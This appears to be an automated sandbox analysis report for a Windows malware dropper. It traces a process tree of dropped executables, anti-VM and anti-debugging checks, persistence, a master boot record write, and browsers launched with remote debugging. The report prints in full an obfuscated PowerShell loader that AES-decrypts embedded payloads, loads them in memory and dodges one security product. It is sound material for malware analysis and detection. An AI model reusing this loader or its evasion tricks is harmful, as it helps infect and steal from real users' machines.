pid Process 3880 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe 3880 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe 4884 skotes.exe 4884 skotes.exe 1392 8c12de9356.exe 1392 8c12de9356.exe 1392 8c12de9356.exe 1392 8c12de9356.exe 3448 skotes.exe 3448 skotes.exe 4344 Bjkm5hE.exe 4344 Bjkm5hE.exe 4344 Bjkm5hE.exe 4344 Bjkm5hE.exe 2044 Fe36XBk.exe 2044 Fe36XBk.exe 4928 powershell.exe 4928 powershell.exe 3516 ViGgA8C.exe 3516 ViGgA8C.exe 2476 powershell.exe 2476 powershell.exe 4488 powershell.exe 4488 powershell.exe 2180 DTQCxXZ.exe 2180 DTQCxXZ.exe 2180 DTQCxXZ.exe 2180 DTQCxXZ.exe 3516 ViGgA8C.exe 3516 ViGgA8C.exe 4564 d2YQIJa.exe 4564 d2YQIJa.exe 4564 d2YQIJa.exe 4564 d2YQIJa.exe 4564 d2YQIJa.exe 4564 d2YQIJa.exe 3352 sHN20me.exe 3352 sHN20me.exe 3352 sHN20me.exe 3352 sHN20me.exe 3352 sHN20me.exe 3352 sHN20me.exe 3736 spoDnGT.exe 3736 spoDnGT.exe 3736 spoDnGT.exe 3736 spoDnGT.exe 3736 spoDnGT.exe 3736 spoDnGT.exe 1084 Ta3ZyUR.exe 1084 Ta3ZyUR.exe 1084 Ta3ZyUR.exe 1084 Ta3ZyUR.exe 5048 skotes.exe 5048 skotes.exe 2980 qFqSpAp.exe 2980 qFqSpAp.exe 2980 qFqSpAp.exe 2980 qFqSpAp.exe 4584 m5UP2Yj.exe 4584 m5UP2Yj.exe 4584 m5UP2Yj.exe 4584 m5UP2Yj.exe 4448 BitLockerToGo.exe 4448 BitLockerToGo.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 3516 ViGgA8C.exe Token: SeDebugPrivilege 4488 powershell.exe Token: SeDebugPrivilege 4400 C3hYpvm.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeDebugPrivilege 5260 powershell.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeDebugPrivilege 5916 powershell.exe Token: SeDebugPrivilege 6124 powershell.exe Token: SeDebugPrivilege 232 powershell.exe Token: SeDebugPrivilege 5764 TempQ6IFT5ZCQY7AFTDXU35ZYNPTDHNKKDYF.EXE Token: SeDebugPrivilege 5988 powershell.exe -
Suspicious use of FindShellTrayWindow 55 IoCs
pid Process 3880 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 3012 48ea1929e8.exe 3012 48ea1929e8.exe 3012 48ea1929e8.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe 2232 msedge.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3012 48ea1929e8.exe 3012 48ea1929e8.exe 3012 48ea1929e8.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4400 C3hYpvm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3880 wrote to memory of 4884 3880 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe 86 PID 3880 wrote to memory of 4884 3880 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe 86 PID 3880 wrote to memory of 4884 3880 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe 86 PID 4884 wrote to memory of 4240 4884 skotes.exe 87 PID 4884 wrote to memory of 4240 4884 skotes.exe 87 PID 4884 wrote to memory of 4240 4884 skotes.exe 87 PID 4240 wrote to memory of 1392 4240 8c12de9356.exe 89 PID 4240 wrote to memory of 1392 4240 8c12de9356.exe 89 PID 4240 wrote to memory of 1392 4240 8c12de9356.exe 89 PID 4240 wrote to memory of 1392 4240 8c12de9356.exe 89 PID 4240 wrote to memory of 1392 4240 8c12de9356.exe 89 PID 4240 wrote to memory of 1392 4240 8c12de9356.exe 89 PID 4240 wrote to memory of 1392 4240 8c12de9356.exe 89 PID 4240 wrote to memory of 1392 4240 8c12de9356.exe 89 PID 4240 wrote to memory of 1392 4240 8c12de9356.exe 89 PID 4884 wrote to memory of 4452 4884 skotes.exe 97 PID 4884 wrote to memory of 4452 4884 skotes.exe 97 PID 4884 wrote to memory of 4452 4884 skotes.exe 97 PID 4884 wrote to memory of 1964 4884 skotes.exe 98 PID 4884 wrote to memory of 1964 4884 skotes.exe 98 PID 4884 wrote to memory of 1964 4884 skotes.exe 98 PID 4884 wrote to memory of 4300 4884 skotes.exe 99 PID 4884 wrote to memory of 4300 4884 skotes.exe 99 PID 4884 wrote to memory of 4300 4884 skotes.exe 99 PID 4300 wrote to memory of 4344 4300 Bjkm5hE.exe 100 PID 4300 wrote to memory of 4344 4300 Bjkm5hE.exe 100 PID 4300 wrote to memory of 4344 4300 Bjkm5hE.exe 100 PID 4300 wrote to memory of 4344 4300 Bjkm5hE.exe 100 PID 4300 wrote to memory of 4344 4300 Bjkm5hE.exe 100 PID 4300 wrote to memory of 4344 4300 Bjkm5hE.exe 100 PID 4300 wrote to memory of 4344 4300 Bjkm5hE.exe 100 PID 4300 wrote to memory of 4344 4300 Bjkm5hE.exe 100 PID 4300 wrote to memory of 4344 4300 Bjkm5hE.exe 100 PID 4884 wrote to memory of 2044 4884 skotes.exe 103 PID 4884 wrote to memory of 2044 4884 skotes.exe 103 PID 4884 wrote to memory of 2044 4884 skotes.exe 103 PID 4884 wrote to memory of 4928 4884 skotes.exe 104 PID 4884 wrote to memory of 4928 4884 skotes.exe 104 PID 4884 wrote to memory of 4928 4884 skotes.exe 104 PID 4884 wrote to memory of 3516 4884 skotes.exe 106 PID 4884 wrote to memory of 3516 4884 skotes.exe 106 PID 4884 wrote to memory of 3516 4884 skotes.exe 106 PID 4928 wrote to memory of 3928 4928 powershell.exe 108 PID 4928 wrote to memory of 3928 4928 powershell.exe 108 PID 4928 wrote to memory of 3928 4928 powershell.exe 108 PID 3928 wrote to memory of 2824 3928 cmd.exe 110 PID 3928 wrote to memory of 2824 3928 cmd.exe 110 PID 3928 wrote to memory of 2824 3928 cmd.exe 110 PID 3928 wrote to memory of 2476 3928 cmd.exe 111 PID 3928 wrote to memory of 2476 3928 cmd.exe 111 PID 3928 wrote to memory of 2476 3928 cmd.exe 111 PID 4884 wrote to memory of 2180 4884 skotes.exe 112 PID 4884 wrote to memory of 2180 4884 skotes.exe 112 PID 4884 wrote to memory of 2180 4884 skotes.exe 112 PID 2476 wrote to memory of 4488 2476 powershell.exe 113 PID 2476 wrote to memory of 4488 2476 powershell.exe 113 PID 2476 wrote to memory of 4488 2476 powershell.exe 113 PID 4884 wrote to memory of 2136 4884 skotes.exe 114 PID 4884 wrote to memory of 2136 4884 skotes.exe 114 PID 4884 wrote to memory of 2136 4884 skotes.exe 114 PID 4884 wrote to memory of 4564 4884 skotes.exe 115 PID 4884 wrote to memory of 4564 4884 skotes.exe 115 PID 4884 wrote to memory of 4564 4884 skotes.exe 115 PID 4452 wrote to memory of 2904 4452 13Z5sqy.exe 116
Processes
-
C:\Users\Admin\AppData\Local\Temp\22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe"C:\Users\Admin\AppData\Local\Temp\22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Users\Admin\AppData\Local\Temp\1014060001\8c12de9356.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\8c12de9356.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Users\Admin\AppData\Local\Temp\1014060001\8c12de9356.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\8c12de9356.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 9564⤵
- Program crash
PID:2716
-
-
-
C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2904
-
-
-
C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1964
-
-
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 9684⤵
- Program crash
PID:3668
-
-
-
C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2044
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:2824
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2180
-
-
C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2136 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4448
-
-
-
C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4564
-
-
C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3352
-
-
C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3736
-
-
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1084
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 9764⤵
- Program crash
PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2980
-
-
C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4584 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 15084⤵
- Program crash
PID:5112
-
-
-
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4392 -
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5032 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2028 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd636dcc40,0x7ffd636dcc4c,0x7ffd636dcc586⤵PID:4460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1876,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1872 /prefetch:26⤵PID:448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2204,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2216 /prefetch:36⤵PID:3916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2472 /prefetch:86⤵PID:1080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3216 /prefetch:16⤵
- Uses browser remote debugging
PID:3404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3268 /prefetch:16⤵
- Uses browser remote debugging
PID:1036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4392,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4556 /prefetch:16⤵
- Uses browser remote debugging
PID:4020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4296 /prefetch:86⤵PID:540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4836,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:86⤵PID:1088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4916,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4904 /prefetch:86⤵PID:540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4924,i,15785985614535483745,17717664187743174648,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4912 /prefetch:86⤵PID:4620
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2232 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd636e46f8,0x7ffd636e4708,0x7ffd636e47186⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2512
-
-
